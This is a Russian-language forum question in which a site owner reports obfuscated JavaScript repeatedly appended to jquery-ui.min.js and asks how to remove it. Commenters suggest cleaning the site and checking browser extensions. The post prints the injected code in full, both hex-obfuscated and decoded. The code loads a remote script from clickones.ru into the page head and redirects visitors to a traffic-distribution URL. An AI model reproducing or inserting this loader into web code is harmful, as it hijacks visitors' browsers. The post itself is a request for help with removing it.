# Вирус в скрипте

Tags: javascript

Добрый день, в конец скрипта добавляется такая ерунда:

```
var _0xa86a=["\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x73\x72\x63","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x63\x6C\x69\x63\x6B\x6F\x6E\x65\x73\x2E\x72\x75\x2F\x61\x70\x69\x2E\x70\x68\x70","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x68\x65\x61\x64","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x63\x6C\x69\x63\x6B\x6F\x6E\x65\x73\x2E\x72\x75\x2F\x74\x64\x73\x2E\x70\x68\x70\x3F\x69\x64\x3D\x33"];isRedirectSript= document[_0xa86a[1]](_0xa86a[0]);isRedirectSript[_0xa86a[2]]= _0xa86a[3];document[_0xa86a[5]][_0xa86a[4]](isRedirectSript);function isRedirect(_0xa5f1x2){if(_0xa5f1x2=== 1){location= _0xa86a[6]}}
```

Декодером выходит такое (Перенаправляет с главной страницы на другой адресс):

```
["script","createElement","src","https://clickones.ru/api.php","appendChild","head","https://clickones.ru/tds.php?id=3"];isRedirectSript= document[_0xa86a[1]](_0xa86a[0]);isRedirectSript[_0xa86a[2]]= 0xa86a[3];document[_0xa86a[5]][_0xa86a[4]](isRedirectSript);function isRedirect(_0xa5f1x2){if(_0xa5f1x2=== 1){location= 0xa86a[6]}})
```

Если просто убирать код, он появляется снова.
Помогите решить проблему, как удалить?

Comment: А чем Вам помочь, кроме как советом - почистить сайт?

Comment: Можно ли своим скриптом удалить этот код? 
Он же вроде добавляется в head как я понимаю.

Comment: Кем добавляется? К какому скрипту (тема ведь JS, а к такому скрипту не просто что-то добавит)

Comment: jquery-ui.min.js

Comment: смотрите на плагины браузера. Особенно mail.ru. И дальше в установленных прогах. И внимательнее при установке скачанных программ...

Comment: @Puvvl `jquery-ui.min.js` - это, конечно, маловероятно, но если это действительно так - просто снесите этот файл и скачайте с оф. сайта.